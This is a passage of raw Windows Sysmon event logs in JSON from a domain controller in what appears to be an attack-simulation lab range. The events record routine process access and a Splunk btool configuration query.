05:46:49.547","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2015,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.547\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.547","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2016,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.547\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.547","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2017,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.547\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.547","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2018,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.562\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C9-5F25-0000-0010EEE40300}\r\nTargetProcessId: 3836\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.562","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C9-5F25-0000-0010EEE40300}","TargetProcessId":"3836","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2019,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.566\r\nProcessGuid: {A837DB8D-01C9-5F25-0000-0010A4E50300}\r\nProcessId: 3824\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list replication_port --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {A837DB8D-01C9-5F25-0000-0010EEE40300}\r\nParentProcessId: 3836\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list replication_port --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.566","ProcessGuid":"{A837DB8D-01C9-5F25-0000-0010A4E50300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list replication_port --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{A837DB8D-01C9-5F25-0000-0010EEE40300}","ParentProcessId":"3836","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list replication_port --no-log","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2020,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.562\r\nSourceProcessGUID: {A837DB8D-01C9-5F25-0000-0010EEE40300}\r\nSourceProcessId: 3836\r\nSourceThreadId: 3832\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-01C9-5F25-0000-0010A4E50300}\r\nTargetProcessId: 3824\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.562","SourceProcessGUID":"{A837DB8D-01C9-5F25-0000-0010EEE40300}","SourceProcessId":"3836","SourceThreadId":"3832","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-01C9-5F25-0000-0010A4E50300}","TargetProcessId":"3824","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2021,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.562\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C9-5F25-0000-0010A4E50300}\r\nTargetProcessId: 3824\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.562","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C9-5F25-0000-0010A4E50300}","TargetProcessId":"3824","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2022,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.562\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.562","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2023,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.562\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.562","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397b